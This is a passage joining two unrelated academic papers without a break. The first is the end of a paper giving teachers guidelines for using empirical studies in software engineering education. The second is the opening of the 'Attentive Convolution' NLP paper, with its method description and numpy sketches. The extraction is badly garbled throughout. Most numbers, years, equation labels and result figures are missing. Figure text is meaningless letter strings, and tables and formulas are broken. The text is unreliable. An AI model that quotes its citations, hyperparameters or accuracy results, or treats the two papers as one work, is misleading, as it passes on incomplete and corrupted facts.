the guideline presented in this paper has not been systematically tested in different learning environments. instead, it represents a starting point based on reflection grounded in teaching practice. we consider the limitations of the study in terms of qualitative criteria for validity (cf. creswell, ). internal validity concerns the congruence between findings and reality. in this study, internal validity thus concerns how credible the guidelines are in light of the realities of software engineering education. as that reality is constantly changing, the match between guidelines and teaching can never be perfect. our study has applied triangulation to increase the internal validity of the results. we have utilised several types of teaching in different modes, in different universities, and with different teachers, to obtain a richer set of experiences from which to draw guidelines. external validity refers to the extent to which findings can be applied to other situations. as our aim is not theory testing, external validity in this article is about enhancing, as far as possible, the transferability of the results. we argue that the guideline developed herein covers a wide range of teaching and learning situations, and thus can be applied widely in graduate and undergraduate education in software engineering. we have attempted to elucidate the limitations of applying the guideline by mapping study types differently to education in academia and industry, and to different purposes, challenges, and validity concerns of interest to teachers. in addition to these limitations, we see that there are certain situations where the guideline would be unsuitable. first, when the execution of an empirical study would cause ethical problems or legal consequences for any of the involved parties; in this case, the teacher should direct the student to a different task. second, the guideline relies on the teacher to assess whether a particular student possesses the necessary prerequisite skills to carry out a particular study; the guideline is not transferable if that information is missing. third, the guideline makes certain assumptions about the learning environment, such as the availability of industry partners for master's degree projects, and the availability of certain teaching resources for other study types. when attempting to apply the guideline, teachers should consider whether the necessary resources are available.

conclusion
there is a lack of guidance on how to use empirical studies in software engineering education. in order to address this gap, this paper provides an overview of different types of empirical studies, their suitability for use in education, as well as challenges with respect to their execution. we analysed our own teaching and the different studies that we applied as part of it, and reported on selected studies from the existing literature. rather than having students conduct pure research, we opt for including different empirical instruments into software engineering courses as a means to stimulate learning.
the present paper provides an initial systematisation of empirical instruments from the educational perspective. we derived a set of purposes and challenges relevant for selecting a particular study type. furthermore, we also discussed validity constraints regarding the results of course-integrated studies. based on our experiences, we assigned the different purposes, challenges, and validity constraints to the different study types, and we provided further discussion on motivation and scheduling issues. we also defined a set of further study selection criteria to provide an initial guideline that helps teachers to select and include empirical studies in their courses. we believe the guideline could be used in a wide variety of settings. we note that the guideline is limited in that it considers a limited number of study types and learning outcomes, namely those that the authors have experience with as teaching aids and study purposes. it may not be suitable in situations where significantly different study types or learning outcomes are called for. since, to the best of our knowledge, no comparable guidelines exist, we cordially invite teachers and researchers to discuss and improve on this proposal. in particular, future work could focus on applying the guidelines in different kinds of software engineering courses and programs, both within academic university education and in industry training. the purposes, challenges, and constraints presented here could thus be further validated, refined, and perhaps extended. another particular consideration is how to perform student assessment when using empirical studies for educational purposes, particularly when group work is involved. what should be assessed, how should assessment be performed fairly when many students are involved, and how should, e.g., knowledge of empirical methods, domain knowledge, procedural knowledge, and the quality of outcomes be balanced in the assessment? we believe that the purposes and validity considerations in tables and could serve as a starting point for creating rubrics that are relevant for this type of teaching. finally, further studies are needed to test the effectiveness of courses using the proposed approaches in terms of their ability to teach. the learning outcomes of such courses should be further explored: beyond what is currently known, what do students learn by conducting empirical studies, and how do their learning outcomes differ from other approaches to software engineering education?

additional information and declarations

funding
this work was supported by tekes, the finnish funding agency for technology and innovation, as part of the n s program of digile (finnish strategic centre for science, technology and innovation in the field of ict and digital business). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript.

grant disclosures
the following grant information was disclosed by the authors: tekes, the finnish funding agency for technology and innovation.

competing interests
the authors declare there are no competing interests.
author contributions • fabian fagerholm, marco kuhrmann and jürgen münch conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: the raw data is included in the tables. references ahadi a, lister r, haapala h, vihavainen a. . exploring machine learning methods to automatically identify students in need of assistance. in: proceedings of the eleventh annual international conference on international computing education research, icer ’ . new york: acm, – . fagerholm et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. armbrust o, ebell j, hammerschall u, münch j, thoma d. . experiences and results from tailoring and deploying a large process standard in a company. software process: improvement and practice ( ): – . ball s, emerson t, lewis j, swarthout jt. . classroom experiments. available at http://serc.carleton.edu/sp/library/experiments/index.html (accessed on january ). barrows hs, tamblyn rm. . problem-based learning: an approach to medical education. new york: springer publishing company, inc. basili v, selby r, hutchens d. . experimentation in software engineering. ieee transactions on software engineering ( ): – doi . /tse. . . basili vr, rombach hd. . the tame project: towards improvement-oriented software environments. ieee transactions on software engineering ( ): – doi . / . . baxter p, jack s. . qualitative case study methodology: study design and implemen- tation for novice researchers. qualitative report ( ): – . blank s. . the four steps to the epiphany. foster city: cafepress.com. blumenfeld pc, soloway e, marx rw, krajcik js, guzdial m, palincsar a. . motivating project-based learning: sustaining the doing, supporting the learning. educational psychologist ( – ): – doi . / . . . brügge b, krusche s, alperowitz l. . software engineering project courses with industrial clients. transactions on computing education ( ): : – : doi . / . carver j, jaccheri l, morasca s, shull f. . issues in using students in empirical studies in software engineering education. in: proceedings of the th international software metrics symposium. – . carver j, jaccheri l, morasca s, shull f. . a checklist for integrating student empirical studies with research and teaching goals. empirical software engineering ( ): – doi . /s - - - . cochran-smith m. . learning and unlearning: the education of teacher educators. teaching and teacher education ( ): – doi . /s - x( ) - . creswell j. . research design: qualitative, quantitative, and mixed methods approaches. rd edition. thousand oaks: sage publications inc. deiters c, herrmann c, hildebrandt r, knauss e, kuhrmann m, rausch a, rumpe b, schneider k. . glose-lab: teaching global software engineering. in: proceedings of th ieee international conference on global software engineering. piscataway: ieee. dewey j. . how we think: a restatement of the relation of reflective thinking to the educative process. boston: dc heath. dillon j. . a review of the research on practical work in school science. technical report. king’s college available at http://score-education.org/media/ /review_of_ research.pdf . fagerholm et al. ( ), peerj comput. sci., doi . /peerj-cs. 
attentive convolution: equipping cnns with rnn-style attention mechanisms
wenpeng yin, department of computer and information science, university of pennsylvania, wenpeng@seas.upenn.edu
hinrich schütze, center for information and language processing, lmu munich, germany, inquiries@cislmu.org

abstract
in nlp, convolutional neural networks (cnns) have benefited less than recurrent neural networks (rnns) from attention mechanisms. we hypothesize that this is because the attention in cnns has been mainly implemented as attentive pooling (i.e., it is applied to pooling) rather than as attentive convolution (i.e., it is integrated into convolution). convolution is the differentiator of cnns in that it can powerfully model the higher-level representation of a word by taking into account its local fixed-size context in the input text tx. in this work, we propose an attentive convolution network, attconv.
it extends the context scope of the convolution operation, deriving higher- level features for a word not only from local context, but also from information ex- tracted from nonlocal context by the atten- tion mechanism commonly used in rnns. this nonlocal context can come (i) from parts of the input text tx that are distant or (ii) from extra (i.e., external) contexts ty. experiments on sentence modeling with zero-context (sentiment analysis), single- context (textual entailment) and multiple- context (claim verification) demonstrate the effectiveness of attconv in sentence rep- resentation learning with the incorporation of context. in particular, attentive convo- lution outperforms attentive pooling and is a strong competitor to popular attentive rnns. introduction natural language processing (nlp) has benefited greatly from the resurgence of deep neural net- works (dnns), thanks to their high performance with less need of engineered features. a dnn typ- ically is composed of a stack of non-linear trans- https://github.com/yinwenpeng/attentive_ convolution. formation layers, each generating a hidden rep- resentation for the input by projecting the output of a preceding layer into a new space. to date, building a single and static representation to ex- press an input across diverse problems is far from satisfactory. instead, it is preferable that the rep- resentation of the input vary in different applica- tion scenarios. in response, attention mechanisms (graves, ; graves et al., ) have been pro- posed to dynamically focus on parts of the in- put that are expected to be more specific to the problem. they are mostly implemented based on fine-grained alignments between two pieces of ob- jects, each emitting a dynamic soft-selection to the components of the other, so that the selected ele- ments dominate in the output hidden representa- tion. attention-based dnns have demonstrated good performance on many tasks. convolutional neural networks (cnns; lecun et al., ) and recurrent neural networks (rnns; elman, ) are two important types of dnns. most work on attention has been done for rnns. attention-based rnns typically take three types of inputs to make a decision at the current step: (i) the current input state, (ii) a representation of local context (computed unidirectionally or bidi- rectionally; rocktäschel et al. [ ]), and (iii) the attention-weighted sum of hidden states cor- responding to nonlocal context (e.g., the hidden states of the encoder in neural machine translation; bahdanau et al. [ ]). an important question, therefore, is whether cnns can benefit from such an attention mechanism as well, and how. this is our technical motivation. our second motivation is natural language un- derstanding. in generic sentence modeling without extra context (collobert et al., ; kalchbrenner et al., ; kim, ), cnns learn sentence rep- resentations by composing word representations that are conditioned on a local context window. we believe that attentive convolution is needed transactions of the association for computational linguistics, vol. , pp. – , . action editor: slav petrov. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. https://github.com/yinwenpeng/attentive_convolution https://github.com/yinwenpeng/attentive_convolution premise, modeled as context ty plant cells have structures that animal cells lack. animal cells do not have cell walls. the cell wall is not a freestanding structure. 
plant cells possess a cell wall, animals never. table : examples of four premises for the hypothesis tx = “a cell wall is not present in animal cells.” in scitail data set. right column (hypothesis’s label): “ ” means true, “ ” otherwise. for some natural language understanding tasks that are essentially sentence modeling within contexts. examples: textual entailment (is a hypothesis true given a premise as the single context?; dagan et al. [ ]) and claim verification (is a claim cor- rect given extracted evidence snippets from a text corpus as the context?; thorne et al. [ ]). con- sider the scitail (khot et al., ) textual en- tailment examples in table ; here, the input text tx is the hypothesis and each premise is a context text ty. and consider the illustration of claim ver- ification in figure ; here, the input text tx is the claim and ty can consist of multiple pieces of con- text. in both cases, we would like the representa- tion of tx to be context-specific. in this work, we propose attentive convolution networks, attconv, to model a sentence (i.e., tx) either in intra-context (where ty = tx) or extra- context (where ty = tx and ty can have many pieces) scenarios. in the intra-context case (sen- timent analysis, for example), attconv extends the local context window of standard cnns to cover the entire input text tx. in the extra-context case, attconv extends the local context win- dow to cover accompanying contexts ty. for a convolution operation over a window in tx such as (leftcontext, word, rightcontext), we first compare the representation of word with all hidden states in the context ty to obtain an attentive context representation attcontext, then convolution filters derive a higher-level represen- tation for word, denoted as wordnew, by integrat- ing word with three pieces of context: leftcontext, rightcontext, and attcontext. we interpret this at- tentive convolution in two perspectives. (i) for intra-context, a higher-level word representation wordnew is learned by considering the local (i.e., leftcontext and rightcontext) as well as nonlocal (i.e., attcontext) context. (ii) for extra-context, wordnew is generated to represent word, together with its cross-text alignment attcontext, in the context leftcontext and rightcontext. in other words, the deci- sion for the word is made based on the connected maybe ha oyofajrfngn ovajrnvhar yaojnbarlvjh nhjarnohg nvhyhnv  va j maybe ha oyofajrfngn ovajrnvhar yaojnbarlvjh nhjarnohg nvhyhnv  va j whatno jmof jag as ajgonah nbjunaeorg  varguoergu arg ag . arghoguerng  mao rhg aer are hn kvar enb bhebn bnjb  ye nerb hbjanrih bjrbn  areb ahofjrf marilyn monroe worked with warner brothers telemundo is an english-language television network. c c ci cn ... contexts claim classes figure : verify claims in contexts. hidden states of cross-text aligned terms, with local context. we apply attconv to three sentence mod- eling tasks with variable-size context: a large- scale yelp sentiment classification task (lin et al., ) (intra-context, i.e., no additional context), scitail textual entailment (khot et al., ) (single extra-context), and claim verification (thorne et al., ) (multiple extra-contexts). attconv outperforms competitive dnns with and without attention and achieves state-of-the-art on the three tasks. overall, we make the following contributions: • this is the first work that equips convolution filters with the attention mechanism com- monly used in rnns. 
• we distinguish and build flexible modules— attention source, attention focus, and atten- tion beneficiary—to greatly advance the ex- pressivity of attention mechanisms in cnns. • attconv provides a new way to broaden the originally constrained scope of filters in conventional cnns. broader and richer con- text comes from either external context (i.e., ty) or the sentence itself (i.e., tx). • attconv shows its flexibility and effec- tiveness in sentence modeling with variable- size context. related work in this section we discuss attention-related dnns in nlp, the most relevant work for our paper. . rnns with attention graves ( ) and graves et al. ( ) first in- troduced a differentiable attention mechanism that allows rnns to focus on different parts of the input. this idea has been broadly explored in rnns, shown in figure , to deal with text generation, such as neural machine translation weighted sum attentive context sentence ty sentence tx hidden states figure : a simplified illustration of attention mecha- nism in rnns. (bahdanau et al., ; luong et al., ; kim et al., ; libovický and helcl, ), response generation in social media (shang et al., ), document reconstruction (li et al., ), and document summarization (nallapati et al., ); machine comprehension (hermann et al., ; kumar et al., ; xiong et al., ; seo et al., ; wang and jiang, ; xiong et al., ; wang et al., a); and sentence relation classi- fication, such as textual entailment (cheng et al., ; rocktäschel et al., ; wang and jiang, ; wang et al., b; chen et al., b) and answer sentence selection (miao et al., ). we try to explore the rnn-style attention mech- anisms in cnns—more specifically, in convolution. . cnns with attention in nlp, there is little work on attention-based cnns. gehring et al. ( ) propose an attention- based convolutional seq-to-seq model for machine translation. both the encoder and decoder are hi- erarchical convolution layers. at the nth layer of the decoder, the output hidden state of a convolu- tion queries each of the encoder-side hidden states, then a weighted sum of all encoder hidden states is added to the decoder hidden state, and finally this updated hidden state is fed to the convolution at layer n + . their attention implementation re- lies on the existence of a multi-layer convolution structure—otherwise the weighted context from the encoder side could not play a role in the de- coder. so essentially their attention is achieved af- ter convolution. in contrast, we aim to modify the vanilla convolution, so that cnns with attentive convolution can be applied more broadly. we discuss two systems that are representative of cnns that implement the attention in pooling (i.e., the convolution is still not affected): yin et al. ( ) and dos santos et al. ( ), illus- trated in figure . specifically, these two systems work on two input sentences, each with a set of convolution convolution inter-hidden-state match column-wise compose row-wise compose sentence tx sentence ty word embedding layer hidden states layer x y x ⋅ softmax( ) y ⋅ softmax( ) representation :t x representation :t y ( × ) matching scores figure : attentive pooling, summarized from abcnn (yin et al., ) and apcnn (dos santos et al., ). hidden states generated by a convolution layer; then, each sentence will learn a weight for ev- ery hidden state by comparing this hidden state with all hidden states in the other sentence; finally, each input sentence obtains a representation by a weighted mean pooling over all its hidden states. 
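before turning to attentive convolution, a rough numpy sketch of this attentive-pooling recipe may help; it follows the description above (a score matrix, per-position weights, weighted mean pooling) rather than the exact abcnn/apcnn implementations, and the max-based aggregation of the score matrix is our simplification.

```python
import numpy as np

def softmax(x):
    e = np.exp(x - x.max())
    return e / e.sum()

def attentive_pooling(Hx, Hy):
    # Hx: (d, n) and Hy: (d, m) are hidden states produced by a convolution
    # layer over sentences tx and ty respectively.
    scores = Hx.T @ Hy                    # (n, m): match every pair of hidden states
    wx = softmax(scores.max(axis=1))      # weight of each position in tx w.r.t. ty
    wy = softmax(scores.max(axis=0))      # weight of each position in ty w.r.t. tx
    rep_x = Hx @ wx                       # weighted mean pooling -> sentence vector of tx
    rep_y = Hy @ wy                       # weighted mean pooling -> sentence vector of ty
    return rep_x, rep_y
```

note that only the matching scores reach the final representations; the aligned hidden states themselves do not, which is the limitation the following paragraphs discuss.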
the core component—weighted mean pooling— was referred to as “attentive pooling,” aiming to yield the sentence representation. in contrast to attentive convolution, attentive pooling does not connect directly the hidden states of cross-text aligned phrases in a fine-grained manner to the final decision making; only the matching scores contribute to the final weighting in mean pooling. this important distinction be- tween attentive convolution and attentive pooling is further discussed in section . . inspired by the attention mechanisms in rnns, we assume that it is the hidden states of aligned phrases rather than their matching scores that can better contribute to representation learning and deci- sion making. hence, our attentive convolution differs from attentive pooling in that it uses attended hidden states from extra context (i.e., ty) or broader-range context within tx to participate in the convolution. in experiments, we will show its superiority. attconv model we use bold uppercase (e.g., h) for matrices; bold lowercase (e.g., h) for vectors; bold lower- case with index (e.g., hi) for columns of h; and non-bold lowercase for scalars. ci hi hi+ sentence tx context ty attentive context attentive convolution layer n layer n+ hi- (a) light attentive convolution layer matching attentive context attentive convolution fbene(hx) fmgran(hx) fmgran(hy) layer n layer n+ source focus beneficiary sentence tx context ty (b) advanced attentive convolution layer figure : attconv models sentence tx with context ty. to start, we assume that a piece of text t (t ∈ {tx, ty}) is represented as a sequence of hidden states hi ∈ rd (i = , , . . . , |t|), forming feature map h ∈ rd×|t|, where d is the dimensionality of hidden states. each hidden state hi has its left context li and right context ri. in concrete cnn systems, contexts li and ri can cover multiple adja- cent hidden states; we set li = hi− and ri = hi+ for simplicity in the following description. we now describe light and advanced versions of attconv. recall that attconvaims to com- pute a representation for tx in a way that convolu- tion filters encode not only local context, but also attentive context over ty. . light attconv figure (a) shows the light version of attconv. it differs in two key points—(i) and (ii)—both from the basic convolution layer that models a sin- gle piece of text and from the siamese cnn that models two text pieces in parallel. (i) a match- ing function determines how relevant each hidden state in the context ty is to the current hidden state hxi in sentence t x. we then compute an average of the hidden states in the context ty, weighted by the matching scores, to get the attentive context cxi for h x i . (ii) the convolution for position i in tx integrates hidden state hxi with three sources of context: left context hxi− , right context h x i+ , and attentive context cxi . attentive context. first, a function generates a matching score ei,j between a hidden state in tx and a hidden state in ty by (i) dot product: ei,j = (hxi ) t · hyj ( ) or (ii) bilinear form: ei,j = (hxi ) t weh y j ( ) (where we ∈ rd×d), or (iii) additive projection: ei,j = (ve) t · tanh(we ·hxi + ue ·h y j ) ( ) where we, ue ∈ rd×d and ve ∈ rd. given the matching scores, the attentive context cxi for hidden state h x i is the weighted average of all hidden states in ty: cxi = ∑ j softmax(ei)j ·h y j ( ) we refer to the concatenation of attentive contexts [cx ; . . . ; c x i ; . . . ; c x |tx|] as the feature map c x ∈ rd×|t x| for tx. 
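as a concrete reading of the matching and weighted-average steps above, a minimal numpy sketch follows; variable names are ours, and only the dot-product and bilinear scorers are shown (the additive variant is omitted).

```python
import numpy as np

def softmax(x):
    e = np.exp(x - x.max())
    return e / e.sum()

def attentive_context(Hx, Hy, We=None):
    # Hx: (d, |tx|), Hy: (d, |ty|) hidden-state feature maps.
    # returns Cx: (d, |tx|), one attentive context vector per position of tx.
    if We is None:
        E = Hx.T @ Hy            # dot-product matching scores
    else:
        E = Hx.T @ We @ Hy       # bilinear matching
    Cx = np.zeros_like(Hx)
    for i in range(Hx.shape[1]):
        a = softmax(E[i])        # attention of position i over the context ty
        Cx[:, i] = Hy @ a        # weighted average of the context hidden states
    return Cx
```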
attentive convolution. after attentive context has been computed, a position i in the sentence tx has a hidden state hxi , the left context h x i− , the right context hxi+ , and the attentive context c x i . attentive convolution then generates the higher- level hidden state at position i: hxi,new = tanh(w · [h x i− , h x i , h x i+ , c x i ] + b) ( ) = tanh(w · [hxi− , h x i , h x i+ ]+ w ·cxi + b) ( ) where w ∈ rd× d is the concatenation of w ∈ rd× d and w ∈ rd×d, b ∈ rd. as equation ( ) shows, equation ( ) can be achieved by summing up the results of two separate and parallel convolution steps before the non-linearity. the first is still a standard convolution-without-attention over feature map hx by filter width over the window (hxi− , h x i , hxi+ ). the second is a convolution on the feature map cx (i.e., the attentive context) with filter width (i.e., over each cxi ); then we sum up the role text premise three firefighters come out of subway station hypothesis three firefighters putting out a fire inside of a subway station table : multi-granular alignments required in textual entailment. results element-wise and add a bias term and the non- linearity. this divide-then-compose strategy makes the attentive convolution easy to implement in practice, with no need to create a new feature map, as required in equation ( ), to integrate hx and cx. it is worth mentioning that w ∈ rd× d cor- responds to the filter parameters of a vanilla cnn and the only added parameter here is w ∈ rd×d, which only depends on the hidden size. this light attconv shows the basic princi- ples of using rnn-style attention mechanisms in convolution. our experiments show that this light version of attconv—even though it incurs a limited increase of parameters (i.e., w )—works much better than the vanilla siamese cnn and some of the pioneering attentive rnns. the fol- lowing two considerations show that there is space to improve its expressivity. (i) higher-level or more abstract representa- tions are required in subsequent layers. we find that directly forwarding the hidden states in tx or ty to the matching process does not work well in some tasks. pre-learning some more high-level or abstract representations helps in subsequent learn- ing phases. (ii) multi-granular alignments are preferred in the interaction modeling between tx and ty. table shows another example of textual entail- ment. on the unigram level, “out” in the premise matches with “out” in the hypothesis perfectly, whereas “out” in the premise is contradictory to “inside” in the hypothesis. but their context snippets—“come out” in the premise and “putting out a fire” in the hypothesis—clearly indicate that they are not semantically equivalent. and the gold conclusion for this pair is “neutral” (i.e., the hypothesis is possibly true). therefore, matching should be conducted across phrase granularities. we now present advanced attconv. it is more expressive and modular, based on the two forego- ing considerations (i) and (ii). . advanced attconv adel and schütze ( ) distinguish between focus and source of attention. the focus of atten- tion is the layer of the network that is reweighted by attention weights. the source of attention is the information source that is used to compute the attention weights. adel and schütze showed that increasing the scope of the attention source is beneficial. it possesses some preliminary princi- ples of the query/key/value distinction by vaswani et al. ( ). 
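before moving on to the advanced variant, a minimal sketch of the light attentive-convolution layer ties the pieces above together. it uses the divide-then-compose formulation, where one filter acts on the local window and a second filter acts on the attentive context; the zero padding at the sentence boundaries is our choice.

```python
import numpy as np

def light_attentive_convolution(Hx, Cx, W1, W2, b):
    # Hx: (d, n) hidden states of tx; Cx: (d, n) attentive contexts (previous sketch).
    # W1: (d, 3d) acts on the local window [h_{i-1}; h_i; h_{i+1}],
    # W2: (d, d) acts on the attentive context, b: (d,).
    d, n = Hx.shape
    Hp = np.concatenate([np.zeros((d, 1)), Hx, np.zeros((d, 1))], axis=1)  # zero padding
    Hnew = np.zeros((d, n))
    for i in range(n):
        window = np.concatenate([Hp[:, i], Hp[:, i + 1], Hp[:, i + 2]])
        # divide-then-compose: local convolution plus attentive-context convolution
        Hnew[:, i] = np.tanh(W1 @ window + W2 @ Cx[:, i] + b)
    return Hnew
```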
here, we further extend this princi- ple to define beneficiary of attention – the feature map (labeled “beneficiary” in figure (b)) that is contextualized by the attentive context (labeled “attentive context” in figure (b)). in the light attentive convolutional layer (figure (a)), the source of attention is hidden states in sentence tx, the focus of attention is hidden states of the con- text ty, and the beneficiary of attention is again the hidden states of tx; that is, it is identical to the source of attention. we now try to distinguish these three con- cepts further to promote the expressivity of an at- tentive convolutional layer. we call it “advanced attconv”; see figure (b). it differs from the light version in three ways: (i) attention source is learned by function fmgran(hx), feature map hx of tx acting as input; (ii) attention focus is learned by function fmgran(hy), feature map hy of con- text ty acting as input; and (iii) attention benefi- ciary is learned by function fbene(hx), hx acting as input. both functions fmgran() and fbene() are based on a gated convolutional function fgconv(): oi = tanh(wh · ii + bh) ( ) gi = sigmoid(wg · ii + bg) ( ) fgconv(ii) = gi ·ui + ( −gi) ·oi ( ) where ii is a composed representation, denoting a generally defined input phrase [· · · , ui, · · · ] of arbitrary length with ui as the central unigram- level hidden state, and the gate gi sets a trade-off between the unigram-level input ui and the tem- porary output oi at the phrase-level. we elaborate these modules in the remainder of this subsection. attention source. first, we present a general instance of generating source of attention by func- tion fmgran(h), learning word representations in multi-granular context. in our system, we con- sider granularities and , corresponding to unigram hidden state and trigram hidden state. for the uni-hidden state case, it is a gated convolution layer: hxuni,i = fgconv(h x i ) ( ) for the tri-hidden state case: hxtri,i = fgconv([h x i− , h x i , h x i+ ]) ( ) finally, the overall hidden state at position i is the concatenation of huni,i and htri,i: hxmgran,i = [h x uni,i, h x tri,i] ( ) that is, fmgran(hx) = hxmgran. such a kind of comprehensive hidden state can encode the semantics of multigranular spans at a position, such as “out” and “come out of.” gating here implicitly enables cross-granular alignments in subsequent attention mechanism as it sets highway connections (srivastava et al., ) between the input granularity and the output granularity. attention focus. for simplicity, we use the same architecture for the attention source (just in- troduced) and for the attention focus, ty (i.e., for the attention focus: fmgran(hy) = h y mgran; see figure (b)). thus, the focus of attention will participate in the matching process as well as be reweighted to form an attentive context vector. we leave exploring different architectures for atten- tion source and focus for future work. another benefit of multi-granular hidden states in attention focus is to keep structure information in the context vector. in standard attention mechanisms in rnns, all hidden states are average-weighted as a context vector, and the order information is missing. by introducing hidden states of larger granularity into cnns that keep the local order or structures, we boost the attentive effect. attention beneficiary. 
in our system, we sim- ply use fgconv() over uni-granularity to learn a more abstract representation over the current hid- den representations in hx, so that fbene(h x i ) = fgconv(h x i ) ( ) subsequently, the attentive context vector cxi is generated based on attention source feature map fmgran(hx) and attention focus feature map fmgran(h y), according to the description of the light attconv. then attentive convolution is conducted over attention beneficiary feature map fbene(h x) and the attentive context vectors cx to get a higher-layer feature map for the sentence tx. . analysis compared with the standard attention mechanism in rnns, attconv has a similar matching func- tion and a similar process of computing context vectors, but differs in three ways. (i) the dis- crimination of attention source, focus, and ben- eficiary improves expressivity. (ii) in cnns, the surrounding hidden states for a concrete position are available, so the attention matching is able to encode the left context as well as the right con- text. in rnns, however, we need bidirectional rnns to yield both left and right context representations. (iii) as attentive convolution can be implemented by summing up two separate convolution steps (equations and ), this ar- chitecture provides both attentive representations and representations computed without the use of attention. this strategy is helpful in practice to use richer representations for some nlp prob- lems. in contrast, such a clean modular separa- tion of representations computed with and without attention is harder to realize in attention-based rnns. prior attention mechanisms explored in cnns mostly involve attentive pooling (dos santos et al., ; yin et al., ); namely, the weights of the post-convolution pooling layer are determined by attention. these weights come from the matching process between hidden states of two text pieces. however, a weight value is not informative enough to tell the relationships between aligned terms. con- sider a textual entailment sentence pair for which we need to determine whether “inside −→ outside” holds. the matching degree (take cosine similar- ity as example) of these two words is high: for ex- ample, ≈ . in word vec (mikolov et al., ) and glove (pennington et al., ). on the other hand, the matching score between “inside” and “in” is lower: . in word vec, . in glove. apparently, the higher number . does not mean that “outside” is more likely than “in” to be en- tailed by “inside.” instead, joint representations for aligned phrases [hinside, houtside], [hinside, hin] are more informative and enable finer-grained rea- soning than a mechanism that can only transmit information downstream by matching scores. we modify the conventional cnn filters so that “in- side” can make the entailment decision by looking at the representation of the counterpart term (“out- side” or “in”) rather than a matching score. a more damaging property of attentive pooling is the following. even if matching scores could convey the phrase-level entailment degree to some extent, matching weights, in fact, are not lever- aged to make the entailment decision directly; instead, they are used to weight the sum of the output hidden states of a convolution as the global sentence representation. in other words, fine-grained entailment degrees are likely to be lost in the summation of many vectors. 
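returning to the advanced attconv described above, the sketch below illustrates the gated convolution fgconv() and the multi-granular construction of the attention source and focus; the parameter packing and the zero padding are our choices, and the beneficiary is simply fgconv() applied to unigrams.

```python
import numpy as np

def sigmoid(x):
    return 1.0 / (1.0 + np.exp(-x))

def fgconv(phrase, u, Wh, bh, Wg, bg):
    # gated convolution: 'phrase' is the concatenated input span, 'u' its central
    # unigram hidden state; the gate trades off unigram input and phrase-level output.
    o = np.tanh(Wh @ phrase + bh)
    g = sigmoid(Wg @ phrase + bg)
    return g * u + (1.0 - g) * o

def multigranular(H, uni_params, tri_params):
    # attention source/focus: at every position, concatenate a uni-granular and a
    # tri-granular gated hidden state.
    d, n = H.shape
    Hp = np.concatenate([np.zeros((d, 1)), H, np.zeros((d, 1))], axis=1)  # zero padding
    cols = []
    for i in range(n):
        tri = np.concatenate([Hp[:, i], Hp[:, i + 1], Hp[:, i + 2]])
        h_uni = fgconv(H[:, i], H[:, i], *uni_params)   # width-1 span
        h_tri = fgconv(tri, H[:, i], *tri_params)       # width-3 span
        cols.append(np.concatenate([h_uni, h_tri]))
    return np.stack(cols, axis=1)                       # (2d, n)
```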
this illustrates why attentive context vectors partici- pating in the convolution operation are expected to be more effective than post-convolution atten- tive pooling (more explanations in § . , paragraph “visualization”). intra-context attention and extra-context at- tention. figures (a) and (b) depict the model- ing of a sentence tx with its context ty. this is a common application of attention mechanism in the literature; we call it extra-context attention. but attconv can also be applied to model a single text input, that is, intra-context attention. consider a sentiment analysis example: “with the nba all-star game in the books i think we can all agree that this was definitely one to re- member. not because of the three-point shootout, the dunk contest, or the game itself but because of the ludicrous trade that occurred after the festivi- ties.” this example contains informative points at different locations (“remember” and “ludicrous”); conventional cnns’ ability to model nonlocal de- pendency is limited because of fixed-size filter widths. in attconv, we can set ty = tx. the attentive context vector then accumulates all re- lated parts together for a given position. in other words, our intra-context attentive convolution is able to connect all related spans together to form a comprehensive decision. this is a new way to broaden the scope of conventional filter widths: a filter now covers not only the local window, but also those spans that are related, but are beyond the scope of the window. comparison to transformer. the “focus” in attconv corresponds to “key” and “value” in transformer; that is, our versions of “key” and “value” are the same, coming from the con- text sentence. the “query” in transformer cor- responds to the “source” and “beneficiary” of attconv; namely, our model has two perspec- tives to utilize the context: one acts as a real query (i.e., “source”) to attend the context, the other (i.e., “beneficiary”) takes the attentive con- our “source-focus-beneficiary” mechanism was inspired by adel and schütze ( ). vaswani et al. ( ) later pub- lished the transformer model, which has a similar “query- key-value” mechanism. text back to improve the learned representation of itself. if we reduce attconv to unigram convo- lutional filters, it is pretty much a single trans- former layer (if we neglect the positional encoding in transformer and unify the “query-key-value” and “source-focus-beneficiary” mechanisms). experiments we evaluate attconv on sentence modeling in three scenarios: (i) zero-context, that is, intra- context; the same input sentence acts as tx as well as ty; (ii) single-context, that is, textual entailment—hypothesis modeling with a single premise as the extra-context; and (iii) multiple- context, namely, claim verification—claim mod- eling with multiple extra-contexts. . common set-up and common baselines all experiments share a common set-up. the input is represented using -dimensional publicly available word vec (mikolov et al., ) em- beddings; out of vocabulary embeddings are ran- domly initialized. the architecture consists of the following four layers in sequence: embedding, attentive convolution, max-pooling, and logistic regression. the context-aware representation of tx is forwarded to the logistic regression layer. we use adagrad (duchi et al., ) for training. embeddings are fine-tuned during training. hyper- parameter values include: learning rate . , hidden size , batch size , filter width . 
all experiments are designed to explore com- parisons in three aspects: (i) within attconv, “light” vs. “advanced”; (ii) “attentive convolution” vs. “attentive pooling”/“attention only”; and (iii) “attentive convolution” vs. “attentive rnn”. to this end, we always report “light” and “advanced” attconv performance and compare against five types of common baselines: (i) w/o context; (ii) w/o attention; (iii) w/o convolution: similar to the transformer’s principle (vaswani et al., ), we discard the convolution oper- ation in equation ( ) and forward the addition of the attentive context cxi and the h x i into a fully connected layer. to keep enough parame- ters, we stack in total four layers so that “w/o convolution” has the same size of parameters as light-attconv; (iv) with attention: rnns with attention and cnns with attentive pooling; and (v) prior state of the art, typeset in italics. systems acc w /o at te nt io n paragraph vector . lin et al. bi-lstm . lin et al. cnn . multichannelcnn (kim) . w it h at te nt io n cnn+internal attention . abcnn . apcnn . attentive-lstm . lin et al. rnn self-att. . a t t c o n v light . w/o convolution . advanced . ∗ table : system comparison of sentiment analysis on yelp. significant improvements over state of the art are marked with ∗ (test of equal proportions, p < . ). . sentence modeling with zero-context: sentiment analysis we evaluate sentiment analysis on a yelp bench- mark released by lin et al. ( ): review-star pairs in sizes k (train), , (dev), and , (test). most text instances in this data set are long: %, %, % percentiles are , , and words, respectively. the task is five-way classification: to stars. the measure is accuracy. we use this benchmark because the predominance of long texts lets us evaluate the system perfor- mance of encoding long-range context, and the system by lin et al. is directly related to attconv in intra-context scenario. baselines. (i) w/o attention. three baselines from lin et al. ( ): paragraph vector (le and mikolov, ) 